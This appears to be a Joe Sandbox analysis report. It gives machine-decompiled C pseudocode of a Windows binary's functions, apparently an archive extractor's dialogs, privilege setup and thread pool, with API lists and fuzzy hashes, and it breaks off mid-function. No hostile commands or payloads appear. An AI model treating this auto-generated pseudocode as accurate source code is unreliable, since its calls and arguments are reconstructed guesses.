                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE31FB
                                                    • _abort.LIBCMT ref: 00CE3306
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer_abort
                                                    • String ID: MOC$RCC
                                                    • API String ID: 948111806-2084237596
                                                    • Opcode ID: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                    • Instruction ID: 411578fa3d324b8ffdd3ec01a599fbd5efc0feb43266d1edc032b23fd1ff5ed7
                                                    • Opcode Fuzzy Hash: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                    • Instruction Fuzzy Hash: 41418C71900189AFCF16DF96CC85AEEBBB5FF08304F148099FA1467262D335AA51DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 66%
                                                    			E00CC7401(void* __ebx, void* __edi, void* __esi) {
                                                    				intOrPtr _t31;
                                                    				long _t38;
                                                    				void* _t45;
                                                    				void* _t48;
                                                    				intOrPtr _t49;
                                                    				void* _t62;
                                                    				void* _t63;
                                                    				void* _t66;
                                                    
                                                    				_t62 = __esi;
                                                    				_t48 = __ebx;
                                                    				E00CDEB78(0xcf27b7, _t66);
                                                    				E00CDEC50(0x1060);
                                                    				 *((intOrPtr*)(_t66 - 0x20)) = 0;
                                                    				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
                                                    				 *((intOrPtr*)(_t66 - 0x18)) = 0;
                                                    				 *((intOrPtr*)(_t66 - 0x14)) = 0;
                                                    				 *((char*)(_t66 - 0x10)) = 0;
                                                    				_t59 =  *((intOrPtr*)(_t66 + 8));
                                                    				_push(0);
                                                    				_push(0);
                                                    				 *((intOrPtr*)(_t66 - 4)) = 0;
                                                    				_push(_t66 - 0x20);
                                                    				if(E00CC3BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
                                                    					if( *0xd01022 == 0) {
                                                    						if(E00CC7A9C(L"SeSecurityPrivilege") != 0) {
                                                    							 *0xd01021 = 1;
                                                    						}
                                                    						E00CC7A9C(L"SeRestorePrivilege");
                                                    						 *0xd01022 = 1;
                                                    					}
                                                    					_push(_t62);
                                                    					_t63 = 7;
                                                    					if( *0xd01021 != 0) {
                                                    						_t63 = 0xf;
                                                    					}
                                                    					_push(_t48);
                                                    					_t49 =  *((intOrPtr*)(_t66 - 0x20));
                                                    					_push(_t49);
                                                    					_push(_t63);
                                                    					_push( *((intOrPtr*)(_t66 + 0xc)));
                                                    					if( *0xd23000() == 0) {
                                                    						if(E00CCBB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
                                                    							L10:
                                                    							E00CC2021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
                                                    							_t38 = GetLastError();
                                                    							E00CC6DCB(0xd01098, _t75);
                                                    							if(_t38 == 5 && E00CD07BC() == 0) {
                                                    								E00CC15C6(_t66 - 0x6c, 0x18);
                                                    								E00CD15FE(_t66 - 0x6c);
                                                    							}
                                                    							E00CC6D83(0xd01098, 1);
                                                    						} else {
                                                    							_t45 =  *0xd23000(_t66 - 0x106c, _t63, _t49);
                                                    							_t75 = _t45;
                                                    							if(_t45 == 0) {
                                                    								goto L10;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				_t31 =  *((intOrPtr*)(_t66 - 0x20));
                                                    				 *((intOrPtr*)(_t66 - 4)) = 2;
                                                    				if(_t31 != 0) {
                                                    					if( *((char*)(_t66 - 0x10)) != 0) {
                                                    						E00CCF445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
                                                    						_t31 =  *((intOrPtr*)(_t66 - 0x20));
                                                    					}
                                                    					_t31 = L00CE3E2E(_t31);
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
                                                    				return _t31;
                                                    			}












                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC7406
                                                      • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CC74CD
                                                      • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                      • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                      • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 3813983858-639343689
                                                    • Opcode ID: 8bd34e8436e264794c3d6f58d388dfd92d2d6838924bee84590cd5a71185ff5a
                                                    • Instruction ID: 188aa581e67995f5f3629511d3fa2734a79ddb100ec9c1927da82714104cd8d5
                                                    • Opcode Fuzzy Hash: 8bd34e8436e264794c3d6f58d388dfd92d2d6838924bee84590cd5a71185ff5a
                                                    • Instruction Fuzzy Hash: F631CFB1E04248AADF11EBA4DC45FEE7BA8EF09304F04411AF955E7282CB748B45DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00CDAD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
                                                    				void* _t12;
                                                    				void* _t16;
                                                    				void* _t19;
                                                    				void* _t22;
                                                    				WCHAR** _t24;
                                                    				intOrPtr _t27;
                                                    				void* _t28;
                                                    				struct HWND__* _t30;
                                                    				signed short _t31;
                                                    
                                                    				_t24 = _a16;
                                                    				_t31 = _a12;
                                                    				_t30 = _a4;
                                                    				_t27 = _a8;
                                                    				if(E00CC1316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
                                                    					L14:
                                                    					__eflags = 1;
                                                    					return 1;
                                                    				}
                                                    				_t28 = _t27 - 0x110;
                                                    				if(_t28 == 0) {
                                                    					_push( *_t24);
                                                    					 *0xd21cb8 = _t24;
                                                    					L13:
                                                    					SetDlgItemTextW(_t30, 0x66, ??);
                                                    					goto L14;
                                                    				}
                                                    				if(_t28 != 1) {
                                                    					L6:
                                                    					return 0;
                                                    				}
                                                    				_t12 = (_t31 & 0x0000ffff) - 1;
                                                    				if(_t12 == 0) {
                                                    					GetDlgItemTextW(_t30, 0x66,  *( *0xd21cb8), ( *0xd21cb8)[1]);
                                                    					_push(1);
                                                    					L10:
                                                    					EndDialog(_t30, ??);
                                                    					goto L14;
                                                    				}
                                                    				_t16 = _t12 - 1;
                                                    				if(_t16 == 0) {
                                                    					_push(0);
                                                    					goto L10;
                                                    				}
                                                    				if(_t16 == 0x65) {
                                                    					_t19 = E00CCC29A(__eflags,  *( *0xd21cb8));
                                                    					_t22 = E00CC1100(_t30, E00CCE617(0x8e),  *( *0xd21cb8), _t19, 0);
                                                    					__eflags = _t22;
                                                    					if(_t22 == 0) {
                                                    						goto L14;
                                                    					}
                                                    					_push( *( *0xd21cb8));
                                                    					goto L13;
                                                    				}
                                                    				goto L6;
                                                    			}













                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDAD98
                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CDADAD
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDADC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 445417207-3402441367
                                                    • Opcode ID: 4f7fd26de3b7eb449ec69691b11a22aef88a1b9846ff9ba781f747a0c2bbc9a4
                                                    • Instruction ID: cc704650685552e3f1e95c80671eecb0c997f5ef10ed9885a3715b0a17472647
                                                    • Opcode Fuzzy Hash: 4f7fd26de3b7eb449ec69691b11a22aef88a1b9846ff9ba781f747a0c2bbc9a4
                                                    • Instruction Fuzzy Hash: C011E632244300BFD3219F68DC45F6A7B6AEF6B702F140012F340DB7A0C7619A16A736
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00CCD8EC(void* __ebx, void* __ecx, void* __edx) {
                                                    				void* __esi;
                                                    				void* _t22;
                                                    				intOrPtr _t26;
                                                    				signed int* _t30;
                                                    				void* _t33;
                                                    				void* _t41;
                                                    				void* _t43;
                                                    				void* _t45;
                                                    				void* _t47;
                                                    				void* _t49;
                                                    				void* _t50;
                                                    
                                                    				_t43 = __edx;
                                                    				_t42 = __ecx;
                                                    				_t41 = __ebx;
                                                    				_t47 = _t49 - 0x64;
                                                    				_t50 = _t49 - 0xac;
                                                    				_t45 = __ecx;
                                                    				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
                                                    					L12:
                                                    					_t22 = 0;
                                                    				} else {
                                                    					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
                                                    					 *((char*)(_t47 + 8)) = 0;
                                                    					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
                                                    					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
                                                    						E00CD1DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
                                                    					}
                                                    					_t26 =  *((intOrPtr*)(_t47 + 0x70));
                                                    					if(_t26 == 0) {
                                                    						E00CD05A7(_t47 + 8, "s", 0x50);
                                                    					} else {
                                                    						_t33 = _t26 - 1;
                                                    						if(_t33 == 0) {
                                                    							_push(_t47 - 0x48);
                                                    							_push("$%s");
                                                    							goto L8;
                                                    						} else {
                                                    							if(_t33 == 1) {
                                                    								_push(_t47 - 0x48);
                                                    								_push("@%s");
                                                    								L8:
                                                    								_push(0x50);
                                                    								_push(_t47 + 8);
                                                    								E00CCE5B1();
                                                    								_t50 = _t50 + 0x10;
                                                    							}
                                                    						}
                                                    					}
                                                    					_t30 = E00CE6159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E00CCD710);
                                                    					if(_t30 == 0) {
                                                    						goto L12;
                                                    					} else {
                                                    						_t20 = 0xcfe278 +  *_t30 * 0xc; // 0xcf4788
                                                    						E00CE67C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
                                                    						_t22 = 1;
                                                    					}
                                                    				}
                                                    				return _t22;
                                                    			}















                                                    APIs
                                                    • __fprintf_l.LIBCMT ref: 00CCD954
                                                    • _strncpy.LIBCMT ref: 00CCD99A
                                                      • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00D01030,?,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                    • String ID: $%s$@%s
                                                    • API String ID: 562999700-834177443
                                                    • Opcode ID: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                    • Instruction ID: 0274a518c89143970607808cef7f5028a4d4a134e9987b1d13970aef3654199f
                                                    • Opcode Fuzzy Hash: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                    • Instruction Fuzzy Hash: 8B21D23640024CAEDB21EEA4CC05FEE7BA8AF05304F14003AFA26961A2E732D648DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 69%
                                                    			E00CD0E46(long* __ecx, long _a4) {
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				long _t11;
                                                    				void* _t14;
                                                    				long _t23;
                                                    				long* _t25;
                                                    
                                                    				_t19 = __ecx;
                                                    				_t11 = _a4;
                                                    				_t25 = __ecx;
                                                    				_t23 = 0x40;
                                                    				 *__ecx = _t11;
                                                    				if(_t11 <= _t23) {
                                                    					if(_t11 == 0) {
                                                    						 *__ecx = 1;
                                                    						_t11 = 1;
                                                    					}
                                                    				} else {
                                                    					 *__ecx = _t23;
                                                    					_t11 = _t23;
                                                    				}
                                                    				_t25[0x41] = 0;
                                                    				if(_t11 > _t23) {
                                                    					 *_t25 = _t23;
                                                    				}
                                                    				_t3 =  &(_t25[0xc8]); // 0x320
                                                    				_t25[0xc5] = 0;
                                                    				InitializeCriticalSection(_t3);
                                                    				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
                                                    				_t14 = CreateEventW(0, 1, 1, 0);
                                                    				_t25[0xc7] = _t14;
                                                    				if(_t25[0xc6] == 0 || _t14 == 0) {
                                                    					_push(L"\nThread pool initialization failed.");
                                                    					_push(0xd01098);
                                                    					E00CC6C31(E00CC6C36(_t19), 0xd01098, _t25, 2);
                                                    				}
                                                    				_t25[0xc3] = 0;
                                                    				_t25[0xc4] = 0;
                                                    				_t25[0x42] = 0;
                                                    				return _t25;
                                                    			}










                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E85
                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E8F
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E9F
                                                    Strings
                                                    • Thread pool initialization failed., xrefs: 00CD0EB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: a39a467b776d239ef7708b2e5b6afb396b4ad9f147f6d44ab5fd2cedede24df0
                                                    • Instruction ID: 97ad0850874dbaa98724dc38d05bf599b53ec3004bf86be774cf0e2cab7761d1
                                                    • Opcode Fuzzy Hash: a39a467b776d239ef7708b2e5b6afb396b4ad9f147f6d44ab5fd2cedede24df0
                                                    • Instruction Fuzzy Hash: 401142B1640708ABC3215F6ADD84BABFBDCEB55754F604C2FE1DA82600DA715A408B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CDB270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                                                    				short _v260;
                                                    				void* __ebx;
                                                    				void* _t15;
                                                    				signed short _t24;
                                                    				struct HWND__* _t28;
                                                    				intOrPtr _t29;
                                                    				void* _t30;
                                                    
                                                    				_t24 = _a12;
                                                    				_t29 = _a8;
                                                    				_t28 = _a4;
                                                    				if(E00CC1316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
                                                    					L10:
                                                    					return 1;
                                                    				}
                                                    				_t30 = _t29 - 0x110;
                                                    				if(_t30 == 0) {
                                                    					SetDlgItemTextW(_t28, 0x67, _a16);
                                                    					goto L10;
                                                    				}
                                                    				if(_t30 != 1) {
                                                    					L5:
                                                    					return 0;
                                                    				}
                                                    				_t15 = (_t24 & 0x0000ffff) - 1;
                                                    				if(_t15 == 0) {
                                                    					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
                                                    					E00CCF3FA(_t24, 0xd17a78,  &_v260);
                                                    					E00CCF445( &_v260, 0x80);
                                                    					_push(1);
                                                    					L7:
                                                    					EndDialog(_t28, ??);
                                                    					goto L10;
                                                    				}
                                                    				if(_t15 == 1) {
                                                    					_push(0);
                                                    					goto L7;
                                                    				}
                                                    				goto L5;
                                                    			}











                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDB2BE
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CDB2D6
                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CDB304
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: GETPASSWORD1
                                                    • API String ID: 445417207-3292211884
                                                    • Opcode ID: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                    • Instruction ID: c7221fe594dd634d5d2a45dcb1690ea2d37d1b81955fa36b69429dd7b21a9f41
                                                    • Opcode Fuzzy Hash: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                    • Instruction Fuzzy Hash: 2711E133A00219B6DB229E659D49FFF3B6DEF19710F010026FB45F2294CBA49E42A771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDDCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                    				WCHAR* _t15;
                                                    				_Unknown_base(*)()* _t19;
                                                    				int _t22;
                                                    
                                                    				 *0xd1ec88 = _a12;
                                                    				 *0xd1ec8c = _a16;
                                                    				 *0xd08464 = _a20;
                                                    				if( *0xd08460 == 0) {
                                                    					if( *0xd08457 == 0) {
                                                    						_t19 = E00CDC220;
                                                    						_t15 = L"REPLACEFILEDLG";
                                                    						while(1) {
                                                    							_t22 = DialogBoxParamW( *0xd0102c, _t15,  *0xd08458, _t19, _a4);
                                                    							if(_t22 != 4) {
                                                    								break;
                                                    							}
                                                    							if(DialogBoxParamW( *0xd01028, L"RENAMEDLG",  *0xd08450, E00CDD600, _a4) != 0) {
                                                    								break;
                                                    							}
                                                    						}
                                                    						return _t22;
                                                    					}
                                                    					return 1;
                                                    				}
                                                    				return 0;
                                                    			}







                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                    • Instruction ID: e9fe8f77a215942595a19e01174b8880244a9ccddcead5f9cf2163045053ea26
                                                    • Opcode Fuzzy Hash: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                    • Instruction Fuzzy Hash: 4A015E76A04349AFDB118F55FC44AAB7BAAE708354B10442AFA4BC2331CA31D951EBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00CE9A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				unsigned int _v20;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				char _v52;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* _t86;
                                                    				signed int _t92;
                                                    				signed int _t93;
                                                    				signed int _t94;
                                                    				signed int _t100;
                                                    				void* _t101;
                                                    				void* _t102;
                                                    				void* _t104;
                                                    				void* _t107;
                                                    				void* _t109;
                                                    				void* _t111;
                                                    				void* _t115;
                                                    				char* _t116;
                                                    				void* _t119;
                                                    				signed int _t121;
                                                    				signed int _t128;
                                                    				signed int* _t129;
                                                    				signed int _t136;
                                                    				signed int _t137;
                                                    				char _t138;
                                                    				signed int _t139;
                                                    				signed int _t142;
                                                    				signed int _t146;
                                                    				signed int _t151;
                                                    				char _t156;
                                                    				char _t157;
                                                    				void* _t161;
                                                    				unsigned int _t162;
                                                    				signed int _t164;
                                                    				signed int _t166;
                                                    				signed int _t170;
                                                    				void* _t171;
                                                    				signed int* _t172;
                                                    				signed int _t174;
                                                    				signed int _t181;
                                                    				signed int _t182;
                                                    				signed int _t183;
                                                    				signed int _t184;
                                                    				signed int _t185;
                                                    				signed int _t186;
                                                    				signed int _t187;
                                                    
                                                    				_t171 = __edx;
                                                    				_t181 = _a24;
                                                    				if(_t181 < 0) {
                                                    					_t181 = 0;
                                                    				}
                                                    				_t184 = _a8;
                                                    				 *_t184 = 0;
                                                    				E00CE4636(0,  &_v52, _t171, _a36);
                                                    				_t5 = _t181 + 0xb; // 0xb
                                                    				if(_a12 > _t5) {
                                                    					_t172 = _a4;
                                                    					_t142 = _t172[1];
                                                    					_v36 =  *_t172;
                                                    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                    						L11:
                                                    						__eflags = _t142 & 0x80000000;
                                                    						if((_t142 & 0x80000000) != 0) {
                                                    							 *_t184 = 0x2d;
                                                    							_t184 = _t184 + 1;
                                                    							__eflags = _t184;
                                                    						}
                                                    						__eflags = _a28;
                                                    						_v16 = 0x3ff;
                                                    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                    						__eflags = _t172[1] & 0x7ff00000;
                                                    						_v32 = _t136;
                                                    						_t86 = 0x30;
                                                    						if((_t172[1] & 0x7ff00000) != 0) {
                                                    							 *_t184 = 0x31;
                                                    							_t185 = _t184 + 1;
                                                    							__eflags = _t185;
                                                    						} else {
                                                    							 *_t184 = _t86;
                                                    							_t185 = _t184 + 1;
                                                    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                    							__eflags = _t164;
                                                    							if(_t164 != 0) {
                                                    								_v16 = 0x3fe;
                                                    							} else {
                                                    								_v16 = _v16 & _t164;
                                                    							}
                                                    						}
                                                    						_t146 = _t185;
                                                    						_t186 = _t185 + 1;
                                                    						_v28 = _t146;
                                                    						__eflags = _t181;
                                                    						if(_t181 != 0) {
                                                    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                                                    						} else {
                                                    							 *_t146 = 0;
                                                    						}
                                                    						_t92 = _t172[1] & 0x000fffff;
                                                    						__eflags = _t92;
                                                    						_v20 = _t92;
                                                    						if(_t92 > 0) {
                                                    							L23:
                                                    							_t33 =  &_v8;
                                                    							 *_t33 = _v8 & 0x00000000;
                                                    							__eflags =  *_t33;
                                                    							_t147 = 0xf0000;
                                                    							_t93 = 0x30;
                                                    							_v12 = _t93;
                                                    							_v20 = 0xf0000;
                                                    							do {
                                                    								__eflags = _t181;
                                                    								if(_t181 <= 0) {
                                                    									break;
                                                    								}
                                                    								_t119 = E00CDEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                    								_t161 = 0x30;
                                                    								_t121 = _t119 + _t161 & 0x0000ffff;
                                                    								__eflags = _t121 - 0x39;
                                                    								if(_t121 > 0x39) {
                                                    									_t121 = _t121 + _t136;
                                                    									__eflags = _t121;
                                                    								}
                                                    								_t162 = _v20;
                                                    								_t172 = _a4;
                                                    								 *_t186 = _t121;
                                                    								_t186 = _t186 + 1;
                                                    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                    								_t147 = _t162 >> 4;
                                                    								_t93 = _v12 - 4;
                                                    								_t181 = _t181 - 1;
                                                    								_v20 = _t162 >> 4;
                                                    								_v12 = _t93;
                                                    								__eflags = _t93;
